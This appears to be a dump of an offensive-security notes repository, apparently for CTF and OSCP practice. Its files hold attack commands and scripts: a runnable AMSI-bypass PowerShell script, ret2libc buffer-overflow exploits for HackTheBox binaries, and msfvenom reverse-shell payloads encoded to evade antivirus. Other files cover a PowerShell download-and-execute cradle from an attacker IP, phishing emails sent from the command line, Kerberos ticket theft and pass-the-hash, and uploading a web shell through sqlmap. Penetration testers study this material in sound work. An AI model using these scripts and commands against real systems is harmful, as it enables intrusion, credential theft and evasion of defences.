15 | 		example: schtasks /create /tr "cscript C:\Windows\Temp\malicious.vbs" /sc onlogon /ru Tyrell /rp "S3cureP4ss@" /tn "Compromised"
16 | 
17 | 	Run a scheduled task as system on system start:
18 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /ru <username> /tn <taskName>
19 | 		example: schtasks /create /tr "C:\Windows\Temp\malicious.exe" /sc onstart /ru System /tn "Hekked"
20 | 
21 | 


--------------------------------------------------------------------------------
/mail/sendemail.txt:
--------------------------------------------------------------------------------
 1 | When doing this in a CTF or simulated environment, use netcat to catch the POST request as python's http server doesn't support POST
 2 | 
 3 | Send an email to a target via CLI:
 4 | 
 5 | 	syntax : sendemail -t <recipient> -f <sender> -s <smtpServer> -u "<title>" -m "<messageBody>" -a <payload/attachment> -xu <smtpUser> -xp <smtpPass>
 6 | 	example: sendemail -t tyrell@ecorp.com -f elliot@hotmail.com -s smtp.gmail.com -u 'Urgent message!' -m "Please read the attached pdf carefully" -a suspicious.pdf -xu admin -xp admin
 7 |     example: sendemail -t tyrell@ecorp.com -f elliot@hotmail.com -s smtp.gmail.com -u 'Urgent message!' -m "Please read the attached pdf carefully" -a suspicious.pdf -xu admin -xp admin -o tls=no
 8 |              # when tls is not supported, use the '-o tls=no' option
 9 | 
10 | Send an email to multiple targets via CLI (emails are in emails.txt):
11 | 
12 |     syntax : while read <variable>; do sendemail -t $<variable> -f <sender> -s <smtpServer> -u "<title>" -m "<messageBody>"; done < <mailList>
13 |     example: while read email; do sendemail -t $email -f it@ecorp.com -s 10.13.15.11 -u "New login page" -m "Login at http://10.10.14.65/"; done < emails.txt
14 | 


--------------------------------------------------------------------------------
/defense_evasion/amsi/OverwriteAmsiContext.ps1:
--------------------------------------------------------------------------------
 1 | # Powershell script to overwrite AmsiContext with null bytes to force AMSI to throw errors
 2 | # DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED
 3 | 
 4 | # loop through all assembly types to get the AmsiUtils class
 5 | $a=[Ref].Assembly.GetTypes()
 6 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}
 7 | 
 8 | # loop through all non-public, static attributes in the AmsiUtils class and grab AmsiContext
 9 | $d=$c.GetFields('NonPublic,Static')
10 | Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}
11 | 
12 | # get address of AmsiContext, convert it to hex and overwrite it with 0
13 | $g=$f.GetValue($null)
14 | [IntPtr]$ptr=$g
15 | [Int32[]]$buf=@(0)
16 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
17 | 
18 | 
19 | ### COPY-PASTE HERE
20 | 
21 | $a=[Ref].Assembly.GetTypes()
22 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}
23 | 
24 | $d=$c.GetFields('NonPublic,Static')
25 | Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}
26 | 
27 | $g=$f.GetValue($null)
28 | [IntPtr]$ptr=$g
29 | [Int32[]]$buf=@(0)
30 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
31 | 


--------------------------------------------------------------------------------
/recon/password_gathering.txt:
--------------------------------------------------------------------------------
 1 | cewl is a tool to scan websites for potential passwords:
 2 | 
 3 | 	syntax : cewl <targetIP> -m <minWordLength> -w <outFile>
 4 | 	example: cewl http://10.12.23.222 -m 6 -w passwords.txt
 5 | 
 6 |     syntax : cewl <targetIP> -d <spiderDepth> -m <minWordLength> -w <outFile> --with-numbers
 7 |     example: cewl http://ecorp.com -d 4 -m 3 -w passwords.txt --with-numbers
 8 | 
 9 | 	# Get contents of a file and turn them to lowercase: tr A-Z a-z < <file> > <lowerCaseOutFile>
10 | 
11 | Use john the ripper to mutate the passwords and generate a wordlist:
12 | 
13 | 	# You can edit the password mutation rules in /etc/john/john.conf
14 | 	# Add $[0-9] at the end of the section where it says '# Wordlist mode rules' 
15 | 	  and every password will be appended with one number	
16 | 
17 | 	syntax : john --wordlist=<file> --rules --stdout > <outFile>
18 | 	example: john --wordlist=passwords.txt --rules --stdout > passDictionary.txt 
19 | 
20 | cupp/cupp3 is a tool that asks for input about a target (name, date of birth, family, partner, pets...) and 
21 | generates a dictionary based on that information:
22 | 
23 | 	example : cupp/cupp3 -i	-> starts interactive mode, enter details about the target
24 | 	
25 | 


--------------------------------------------------------------------------------
/pivoting/chisel.txt:
--------------------------------------------------------------------------------
 1 | Build chisel for Windows x64:
 2 | 
 3 | 	Step 1: GOOS=windows GOARCH=amd64 go build
 4 | 
 5 | Reverse pivot:
 6 | 	Step 1(attacker): Set up the Chisel server
 7 |         syntax : chisel server -p <serverPort> -reverse
 8 |         example: chisel server -p 8000 -reverse
 9 | 	Step 2(victim)	: Connect to the chisel server and forward a local and a remote port to the attacker
10 |         syntax : chisel client <attackerIP>:<serverPort> R:127.0.0.1:<attackerPort>:<victimIP>:<victimPort>
11 |         example: chisel client 10.10.14.10:8000 R:127.0.0.1:443:127.0.0.1:45942 R:127.0.0.1:80:10.10.35.5:45942
12 | 
13 | Local pivot:
14 | 	Step 1(attacker): Set up the Chisel server
15 |         syntax : chisel server -p <serverPort>
16 |         example: chisel server -p 8000
17 | 	Step 2(victim)	: 
18 |         syntax : chisel client <attackerIP>:<serverPort> <attackerPort>:127.0.0.1:<victimPort>	
19 |         example: chisel client 10.10.14.3:8000 9002:127.0.0.1:8000
20 | 
21 | SOCKS proxy:
22 |     # First set up /etc/proxychains4.conf, append "socks5 127.0.0.1  1080"
23 |     Step 1(attacker): chisel server -p <serverPort>
24 |     Step 2(victim)  : chisel client <attackerIP:<serverPort> R:socks
25 |     Step 3(attacker): nmap -sT -Pn -n <targetIP
26 | 


--------------------------------------------------------------------------------
/ldap/blind_ldap_injection.txt:
--------------------------------------------------------------------------------
 1 | A very good guide on LDAP injection: https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
 2 | 
 3 | 
 4 | Use wfuzz to find existing ldap attributes on the target server (error message -> atribute not found):
 5 | 
 6 | 	syntax : wfuzz --hs "<errorMsg>" -w <dictionary> -d '<values>' -u <targetUrl>
 7 | 	example: wfuzz -c --hs "not found" -w ldapAttributes.txt -d 'name=ldapuser)(FUZZ=*) -u 10.13.14.15/login.php
 8 | 		 
 9 | 	example: wfuzz -c --hs "not found" -z file,ldapAttributes.txt -d 'Username=admin%2529%2528FUZZ%253d%252a&pass=x' -u 10.12.12.15/login.php
10 | 		 # 'admin%2529%2528FUZZ%253d%252a&' is double url-encoded, see python 'urllib.quote_plus("<text>")'
11 | 
12 | 	
13 | Use wfuzz to find value of attributes:
14 | 
15 | 	syntax : wfuzz -c --hs "<errorMsg>" -z file,<dictionary> -d '<values>' -u <targetUrl>
16 | 	example: wfuzz -c --hs "not found" -z file,digits.txt -d 'Username=admin%2529%2528password%253dFUZZ%252a&pass=x' -u 10.12.12.15/login.php
17 | 	example: wfuzz -c --hs "not found" -w digits.txt -d 'Username=admin)(password=FUZZ*)&pass=x' -u 10.12.12.15/login.php
18 | 		 # When you find a match, append that to your payload like this: 'Username=admin)(password=12FUZZ*)
19 | 


--------------------------------------------------------------------------------
/windows/base64.txt:
--------------------------------------------------------------------------------
 1 | Use Powershell to encode/decode base64 strings:
 2 | 
 3 |     Encode:
 4 |         Step 1 - Assign variable with payload:
 5 |             syntax : $<var> = "<payload>"
 6 |             example: $str = "IEX ((new-object net.webclient).downloadstring('http://10.15.23.53:80/stager.ps1'))"
 7 | 
 8 |         Step 2 - Encode the payload:
 9 |             syntax : [System.Convert]::ToBase64String([System.Text.Encoding]::<encoding>.GetBytes($<var>))
10 |             example: [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
11 |             example: [System.Convert]::ToBase64String([System.Text.Encoding]::UTF-8.GetBytes($str))
12 | 
13 |     Decode:
14 |         Step 1 - Assign variable with payload:
15 |             syntax : $<var> = "<payload>"
16 |             example: $str = "SQBFAFgAIAAoACgAbgBlAHcAL...ADMAOgA4ADAALwBzAHAcwAxACcAKQApAA=="
17 | 
18 |         Step 2 - Decode the payload:
19 |             syntax : [System.Text.Encoding]::<encoding>.GetString([System.Convert]::FromBase64String($<var>))
20 |             example: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($str))
21 |             example: [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($str))
22 | 
23 | 
24 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/linux/htbOctoberOverflow.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # This is the finished overflow script we use on the binary on the target machine
 3 | # Check Ippsec's 'Hackthebox October' video
 4 | 
 5 | # from subprocess import call
 6 | import struct
 7 | 
 8 | binaryLoc = "/home/<user>/binary"
 9 | 
10 | libcBaseAddr = 0xb7e19000 # libc address 'ldd /home/user/binary | grep libc'
11 | 
12 | systemOffset = 0x0003ada0 # system address 'readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system'
13 | exitOffset = 0x0002e9d0   # also from 'readelf -s ... | grep exit
14 | argShOffset = 0x0015ba0b  # /bin/sh 'strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh'
15 | 
16 | systemAddr = struct.pack("<I", libcBaseAddr + systemOffset) # found by doing 'p system' in gdb
17 | exitAddr = struct.pack("<I", libcBaseAddr + exitOffset)
18 | argAddr = struct.pack("<I", libcBaseAddr + argShOffset) # found by doing 'searchmem /bin/sh' in another binary
19 | 
20 | buf = "A" * 52 # 52 is the offset we found with the ruby pattern scripts
21 | buf += systemAddr
22 | buf += exitAddr
23 | buf += argAddr
24 | 
25 | print buf
26 | 
27 | # Bruteforce ASLR
28 | #i = 0
29 | #while (i <= 512):
30 | #    print "Try %s" %i
31 | #    i += 1
32 | #   ret = call([binaryLoc, buf])
33 | 
34 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/rop.txt:
--------------------------------------------------------------------------------
 1 | Useful stuff to know for exploiting binaries using ROP chains
 2 | 
 3 |     Stack frame:
 4 |         A stack frame with stack canary protection looks like this:
 5 |                                                                 <Bottom of memory, top of stack>
 6 | 
 7 |                                                                 <ESP>
 8 |                                                                 <Buffer 2>
 9 |                                                                 <Buffer 1>
10 |                                                                 <Saved RBP>
11 |                                                                 <Stack canary>
12 |                                                                 <Return address>
13 | 
14 |                                                                 <Top of memory, bottom of stack>
15 | 
16 |     x86 assembly:
17 |         Arguments to functions are passed directly onto the stack in x86 architecture.
18 | 
19 |     x86_64 assembly:
20 |         Arguments to functions are passed into RDI (arg1), RSI (arg2), RDX (arg3), RCX (arg4), R8 (arg5), R9 (arg6).
21 |         If there are more than 6 arguments for a function call, the rest of the arguments are pushed directly on the stack.
22 | 


--------------------------------------------------------------------------------
/networking/iptables.txt:
--------------------------------------------------------------------------------
 1 | Check all firewall port rules:
 2 | 
 3 | 	example: iptables -L -n
 4 | 
 5 | Flush iptables rules:
 6 | 
 7 | 	syntax : iptables -F <chain>
 8 | 	example: iptables -F 		#Flush all
 9 | 	example: iptables -F INPUT	#Flush only INPUT rules
10 | 
11 | Use iptables to set a rule that certain ports can only be accessed via loopback interface:
12 | 
13 | 	syntax : iptables -A INPUT -p <protocol> --destination-port <port> \! -d <allowedIP> -j DROP
14 | 	example: iptables -A input -p tcp --destination-port 9001 \! -d 127.0.0.1 -j DROP
15 | 	
16 | Use iptables to open ports:
17 | 
18 | 	syntax : iptables -A INPUT -m state --state NEW -m <protocol> -p <protocol> --dport <port> -j ACCEPT -m comment <comment>
19 | 	example: iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 8080 -j ACCEPT -m comment --comment "opened API port"
20 | 
21 | Redirect outgoing traffic from one destination to another:
22 | 
23 | 	syntax : iptables -t nat -A OUTPUT -p <protocol> -d <originalIP> --dport <originalPort> -j DNAT --to-destination <newIP>:<newPort>
24 | 	example: iptables -t nat -A OUTPUT -p tcp -d 10.10.10.10 --dport 8000 -j DNAT --to-destination 10.10.10.11:8080
25 | 	example: iptables -t nat -A OUTPUT -p tcp -d 10.10.10.10 --dport 8000 -j DNAT --to-destination 10.10.10.10:1313
26 | 
27 | 


--------------------------------------------------------------------------------
/remote_connection/psRemoting.txt:
--------------------------------------------------------------------------------
 1 | PS-Remoting allows you to execute Powershell commands on remote Windows systems.
 2 | It's kinda like SSH, but for Windows.
 3 | 
 4 | Enable PS-Remoting on the current Windows box:
 5 | 	example: Enable-PSRemoting -Force
 6 | 
 7 | Test connection to another box:
 8 | 	syntax : Test-WsMan <targetIP>
 9 | 		 # If there's an error message, connection failed
10 | 
11 | Execute commands on a remote Windows box with non-interactive shell:
12 | 	Step 1: $pwrd = ConvertTo-SecureString "<password>" -AsPlainText -Force
13 | 	Step 2: $cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', $pwrd)
14 | 	Step 3: Invoke-Command -ComputerName <targetIP/hostname> -Credential $cred -ScriptBlock {<command>}
15 | 
16 | 	Example:
17 | 		$pwrd = ConvertTo-SecureString "Y7WjO5%j" -AsPlainText -Force
18 | 		$cred = New-Object System.Management.Automation.PSCredential('intranet.ecorp\Tyrell', $pwrd)
19 | 		Invoke-Command -ComputerName DC.intranet.ecorp -Credential $cred -ScriptBlock { type C:\Users\Tyrell\Documents\secrets.txt }
20 | 		
21 | Enter a remote Powershell session to get a shell on the remote Windows box:
22 | 	syntax : Enter-PSSession -ComputerName <computer> -Credential <user>
23 | 	example: Enter-PSSession -ComputerName 192.168.15.11 -Credential Tyrell
24 | 


--------------------------------------------------------------------------------
/windows/active_directory/bloodhound.txt:
--------------------------------------------------------------------------------
 1 | Bloodhound is a great tool to find and visualise attack paths to own users or domain admin.
 2 | https://github.com/BloodHoundAD/BloodHound
 3 | 
 4 | Run sharphound from windows host to get data:
 5 | 
 6 | 	Step 1: Open a new command prompt on your windows host as a victim user for which you have credentials 
 7 | 	syntax : runas /netonly /user:<domain>\<username> cmd
 8 | 	example: runas /netonly /user:ECORP\victim cmd
 9 | 
10 | 	Step 2: In the newly opened terminal, run sharphound
11 | 	syntax : SharpHound.exe -c <collectionMethod> -d <domain> --domaincontroller <domainControllerIP>
12 | 	example: SharpHound.exe -c all -d ECORP --domaincontroller 10.11.1.245
13 | 
14 | Run sharphound from the victim itself:
15 | 
16 | 	Step 1(attacker): python -m SimpleHTTPServer 80		# In same directory as 'SharpHound.ps1'
17 | 	Step 2(victim)	: IEX (New-Object Net.WebClient).downloadString('http://<attackerIP>/SharpHound.ps1')
18 | 	Step 3(victim)	: Import-Module .\SharpHound.ps1
19 | 	Step 3(victim)	: Invoke-BloodHound -CollectionMethod all -LdapUser <ldapUsername> -LdapPass <ldapPassword>
20 | 
21 | Run bloodhound to analyze found data:
22 | 
23 | 	Step 1: neo4j start
24 | 	Step 2: bloodhound
25 | 	Step 3: after logging in, drag and drop the zip file into the bloodhound main screen and start querying
26 | 


--------------------------------------------------------------------------------
/windows/active_directory/group_policy_objects.txt:
--------------------------------------------------------------------------------
 1 | Group Policy Objects (GPO) are sets of configurations applied to Organizational Units (OU) in a domain.
 2 | 
 3 | Import PowerView into Powershell to start recon:
 4 |     Security Identifiers (SID) of principals that can create new GPOs in the domain:
 5 |         syntax : Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=<domain>,DC=<tld>" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" }
 6 |         example: Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=allsafe,DC=com" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
 7 | 
 8 |         Grab the SID of the principal you want and translate it:
 9 |             syntax :  ConvertFrom-SID <SID>
10 |             example:  ConvertFrom-SID S-1-5-21-3854823697-2196233505-1834024910-1202
11 | 
12 |     Principals that can write to the GP-link attribute on OUs:
13 |         syntax : Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" }
14 |         example: Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
15 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/linux/htbNodeOverflow.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # This is the finished overflow script we use on the binary on the target machine (Hackthebox Node)
 3 | # Check Ippsec's 'Hackthebox October' video
 4 | 
 5 | from subprocess import call
 6 | import struct
 7 | 
 8 | binaryLoc = "/usr/local/bin/backup"
 9 | arg1 = "randomText"
10 | key = "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"
11 | 
12 | libcBaseAddr = 0xf75b0000 #libc address 'ldd /home/user/binary | grep libc'
13 | 
14 | systemOffset = 0x0003a940 # system address 'readelf -s /lib32/libc.so.6 | grep system'
15 | exitOffset   = 0x0002e7d0 # also from 'readelf -s ... | grep exit
16 | argShOffset  = 0x00015900b # /bin/sh 'strings -a -t x /lib32/libc.so.6 | grep /bin/sh'
17 | 
18 | # '<I' stands for 'Little Endian' format
19 | systemAddr = struct.pack("<I", libcBaseAddr + systemOffset)
20 | exitAddr = struct.pack("<I", libcBaseAddr + exitOffset)
21 | argAddr = struct.pack("<I", libcBaseAddr + argShOffset)
22 | 
23 | buf = "A" * 512 # 512 is the offset we found by checking gdb when the script overwrites the EIP
24 | buf += systemAddr
25 | buf += exitAddr
26 | buf += argAddr
27 | 
28 | # print buf
29 | 
30 | # Bruteforce ASLR
31 | i = 0
32 | while (i <= 512):
33 |     print "Try %s" %i
34 |     i += 1
35 |     ret = call([binaryLoc, arg1, key ,buf])
36 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/msfvenom.txt:
--------------------------------------------------------------------------------
 1 | Generate reverse shell payloads to execute on a victim box:
 2 | 	
 3 | 	syntax : msfvenom -a <arch> --platform <OS> -p <payload> LHOST=<hostIP> LPORT=<hostPort> -f <fileType> -o <outputFile>
 4 | 	example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.12.15.117 LPORT=6697 -f exe -o venom.exe
 5 | 
 6 | 
 7 | Generate encoded reverse shell payloads to bypass antivirus and exclude bad characters:	
 8 | 	
 9 | 	syntax : msfvenom -a <arch> --platform <OS> -p <payload> LHOST=<hostIP> LPORT=<hostPort> -e <encoder> -b '<badChars>' -f <fileType> -v <variableName>
10 | 	example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f python -v shellcode
11 | 	example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
12 | 		 # EXITFUNC=thread is for remote BOF, when you close your reverse shell session, the target program won't crash
13 | 
14 | 	example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -i 9 -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
15 | 		 # The -i tag specifies how many times the file should be encoded
16 | 


--------------------------------------------------------------------------------
/windows/active_directory/unconstrained_delegation.txt:
--------------------------------------------------------------------------------
 1 | Get cached TGT tickets from machines where unconstrained delegation is enabled (requires elevated privileges):
 2 |     Step 1: Check if there are cached tickets
 3 |         example: Rubeus.exe triage
 4 |         
 5 |         result : | <LUID> | <user> @ <domain> | <service>/<realm> | <endTime> |
 6 |         example: | 0x1fff54b | e.alderson @ allsafe.com | krbtgt/allsafe.com | 14/03/2020 21:44:45 |
 7 | 
 8 |     Step 2: Dump tickets in base64 format
 9 |         example: Rubeus.exe dump /nowrap    -> nowrap outputs the base64 on one line
10 | 
11 |         Dump only for specific users or services
12 |             syntax : Rubeus.exe dump /luid:<LUID>
13 |             example: Rubeus.exe dump /luid:0x1fff54b /nowrap
14 | 
15 |             syntax : Rubeus.exe dump /service:<service>
16 |             example: Rubeus.exe dump /service:krbtgt /nowrap
17 | 
18 |     Step 3: Create a sacrificial process and inject the TGT into it, then inject into that process 
19 |         Step 1: Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe   -> get processID and LUID from this result
20 |         Step 2: Rubeus.exe ptt /luid:<LUID> /ticket:<base64TGT>
21 |         Step 3: Go to process list and inject into process with <processID>
22 | 
23 |     Step 4: You have now impersonated the user for whom you dumped the TGT
24 | 


--------------------------------------------------------------------------------
/databases/sql/sqlmap.txt:
--------------------------------------------------------------------------------
 1 | Sqlmap is an sql injection automation tool, capable of finding and exploiting sql injections (NOT allowed on OSCP)
 2 | 
 3 | 	Find sql injection vulnerabilities via url parameter:
 4 | 		syntax : sqlmap -u <targetURL>
 5 | 		example: sqlmap -u http://vulnsite.com/clients.php?id=150
 6 | 
 7 | 	Sql injection exploits via url parameter:
 8 | 		syntax : sqlmap -u <targetURL> --dbms=<sqlVersion> --dump --threads=5
 9 | 		example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms/-D=mssql --dump --threads=5
10 | 		example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms/-D=mysql --os-shell
11 | 		
12 | 	Sql injection on a login form with POST data:
13 | 		syntax : sqlmap -u <targetURL> --data="<POSTData>"
14 | 		example: sqlmap -u http://www.vulnserver.com/login.php --data="username=admin&password=admin" --dump 
15 | 
16 | 	Sql injection on a login form with POST data via Burp request:
17 | 		step 1 : make the POST request in burp and send to repeater
18 | 		Step 2 : in repeater tab, right click the content screen and copy to file	-> <requestFile>
19 | 		Step 3 : sqlmap -r <requestFile>
20 | 
21 | 	Upload a file via sqlmap:
22 | 		syntax : sqlmap -u <targetURL> --data="<POSTData>" --file-write=<localFile> --file-dest=<remoteFileDestination>
23 | 		example: sqlmap -u http://10.10.10.167/view_product.php --data="productId=32" --file-write=./bobeye.php  --file-dest=c:\inetpub\wwwroot\bobeye.php
24 | 


--------------------------------------------------------------------------------
/recon/wfuzz.txt:
--------------------------------------------------------------------------------
 1 | https://tools.kali.org/web-applications/wfuzz
 2 | 
 3 | flags:	-w = dictionary list	-u = url	--hh = hide character count (ex: 13456 Ch)	--hc = hide error replies	--hs = if this error message is not found, print the result
 4 | 	-d = POST data		-H = headers	--basic <user>:<pass> = basic authorization
 5 | 
 6 | wfuzz bruteforcing:
 7 | 
 8 | 	enumerate usernames on a login form:
 9 | 
10 | 		syntax : wfuzz -c -w <dictionary> -d "<POSTdata>" --hs "<errorMsg>" <victimURL>
11 | 		example: wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=<pass>" --hs "No login found for that username." http://10.12.25.32/login.php
12 | 	
13 | 	enumerate subdomains:
14 | 
15 | 		syntax : wfuzz -u <targetUrl> -c -z file,<dictionary> --hc 404 -H "<value>: FUZZ.<url>"
16 | 		example: wfuzz -u http://10.13.12.11/ -c -z file,/usr/share/seclists/Discovery/DNS/subdomains-top1mil-5000.txt --hw=55 -H "Host: FUZZ.website.com"
17 | 		example: wfuzz -c -w /usr/share/wordlists/dirb/common.txt --sc=421 -H "Host:FUZZ.website.com" https://website.com/
18 | 		example: wfuzz -H 'Host: FUZZ.vulnerable.org' -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -u vulnerable.org --hh 11175
19 | 
20 | 	enumerate web directories:
21 | 
22 | 		syntax : wfuzz -w <dictionary> -u <url>/FUZZ --hh <characterCount> --hc <errorCode>
23 | 		example: wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u admin.vulnerable.org/secrets/FUZZ --hh 26 --hc 404
24 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/immunityDbg.txt:
--------------------------------------------------------------------------------
 1 | Immunity debugger is used when you have to analyze a running process
 2 | 
 3 | Setting up immunity debugger:
 4 | 	
 5 | 	Step 1	: Run immunity as administrator
 6 | 	Step 2	: File -> attach -> attach the process you need
 7 | 	Step 3	: Press play to run the program (top left somewhere)
 8 | 	Optional: Change appearance
 9 | 
10 | 
11 | Setting up mona (https://github.com/corelan/mona): 
12 | 	
13 | 	(from the github page)	
14 | 	Step 1  : Drag 'mona.py' into the 'PyCommands' folder inside the 'Immunity Debugger' application folder
15 | 		  (C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)
16 | 
17 | 	Step 2  : Install Python 2.7.14 (or a higher 2.7.xx version) into c:\python27, thus overwriting the version
18 | 		  that was bundled with Immunity. This is needed to avoid TLS issues when trying to update mona.
19 | 
20 | 
21 | Using immunity debugger:
22 | 	
23 | 	Place breakpoint: F2
24 | 	Follow expr 	: Click the right arrow pointing to the four vertical dots in the top bar (->:) and enter an address.
25 | 
26 | 
27 | Using Mona:
28 | 
29 | 	Get modules : !mona modules
30 | 	Find jmp ESP: Go to executable modules list (click the 'e' at the top bar)
31 | 	Search cmds : 'Right click assembly pane -> search for -> command/sequence of commands'
32 | 	Check perms : Go to modules list (click on the 'm' at the top bar)
33 | 	Find opcode : !mona find -s "<opcode>" -m <moduleName>		# example: !mona find -s "\xff\xe4" -m slmfc.dll
34 | 


--------------------------------------------------------------------------------
/windows/active_directory/rubeus.txt:
--------------------------------------------------------------------------------
 1 | Rubeus is a C# tool for interacting and abusing Kerberos (https://github.com/GhostPack/Rubeus)
 2 | 
 3 | Overpass-The-Hash (Cobalt Strike):
 4 |     Step 1 (Cobalt Strike): Request the ticket
 5 |         syntax : Execute-Assembly /opt/Rubeus.exe asktgt /user:<user> /rc4:<ntlmHash> /nowrap
 6 |         example: Execute-Assembly /opt/Rubeus.exe asktgt /user:e.alderson /rc4:2f8a408a8aec822ef2e458b564b8c075 /nowrap
 7 | 
 8 |     Step 2 (attacker): Grab the b64 encoded ticket, b64 decode it and write it to a .kirbi file on your attacking system
 9 |         example: echo "xSLdygkMhTLIJ1N3zYtwcg==" | base64 -d > ealderson.kirbi
10 | 
11 |     Step 3 (Cobalt Strike): Create a throwaway logon session
12 |         syntax : make_token <domain>\<user> <anything>
13 |         example: make_token ecorp.local\e.alderson randomstuff123
14 | 
15 |     Step 4 (Cobalt Strike): Import the TGT
16 |         syntax : kerberos_ticket_use <pathToKirbi>
17 |         example: kerberos_ticket_use /tmp/ealderson.kirbi
18 | 
19 |     Optional step 5 (Cobalt Strike): Revert the ticket and become your initial user again
20 |         example: rev2self
21 | 
22 | Check for new tickets every X seconds:
23 |     syntax : Rubeus.exe monitor /interval:<seconds>
24 |     example: Rubeus.exe monitor /interval:20
25 | 
26 | Dump service ticket (requires local admin privileges):
27 |     syntax : Rubeus.exe dump /service:<service>
28 |     example: Rubeus.exe dump /service:krbtgt
29 | 
30 | 


--------------------------------------------------------------------------------
/windows/pass_the_hash.txt:
--------------------------------------------------------------------------------
 1 | If you have the NTLM hashed password of a user, you can use that hash to login remotely to a windows box, instead of using the plaintext password:
 2 | 
 3 | 	# Say we have the administrator hash of a windows machine (Administrator:500:aac3b435b61404eeaad3b435b51604ee:f6b7160bfc91823792e0ac3a162c9267:::)
 4 |     # NOTE: if you only have the nthash, use this format: 00000000000000000000000000000000:f6b7160bfc91823792e0ac3a162c9267
 5 | 
 6 | 	syntax : pth-winexe -U <user>%<lmhash>:<nthash> //<targetIP> <command>
 7 | 	example: pth-winexe -U Administrator%aac3b435b61404eeaad3b435b51604ee:f6b7160bfc91823792e0ac3a162c9267 //10.14.12.151 cmd
 8 | 
 9 | 	syntax : python psExec.py -hashes <lmhash>:<nthash> <user>@<targetIP> <command>
10 |  	example: python psExec.py -hashes aad3b425b51404aeaed3b435b51404ee:32543b11e6aa90ff43d32c66a07ceea6 administrator@10.12.12.144 powershell
11 | 
12 | 	syntax : impacket-wmiexec -hashes <lmhash>:<nthash> <user>@<targetIP>
13 | 	example: impacket-wmiexec -hashes aad3b425b51404aeaed3b435b51404ee:32543b11e6aa90ff43d32c66a07ceea6 administrator@10.12.12.144
14 | 	
15 | 	syntax : python smbclient.py <user>@<targetIP> -hashes <lmhash>:<nthash>
16 | 	example: python smbclient.py Administrator@10.10.10.103 -hashes aac3b435b61404eeaad3b435b51604ee:f6b7160bfc91823792e0ac3a162c9267
17 | 
18 | 	syntax : evil-winrm -i <targetIP> -u <user> -H <nthash>
19 | 	example: evil-winrm -i 172.16.223.158 -u Administrator -H 822623ccd7154f47cd965b14af1558be
20 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/linux/guide.txt:
--------------------------------------------------------------------------------
 1 | See the 'overflow.py' binary and Ippsec's 'Hackthebox October' video! (https://www.youtube.com/watch?v=K05mJazHhF4)
 2 | 
 3 | Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine:
 4 | 
 5 | Step 1: gdb ./<binary>    # example: gbd ./runme `python -c 'print "A"*200'`
 6 | Step 2: b main
 7 | Step 3: r (run)	     
 8 | Step 4: c (continue)
 9 | 
10 | 
11 | optionals   : checksec (check security measures in place); si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main);
12 | get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
13 | get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
14 | 
15 | check ASLR  : ldd <binary> | grep libc	                        # if memory address changes everytime, ASLR is enabled
16 | disable ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR, which randomizes libc memory address (requires root access)
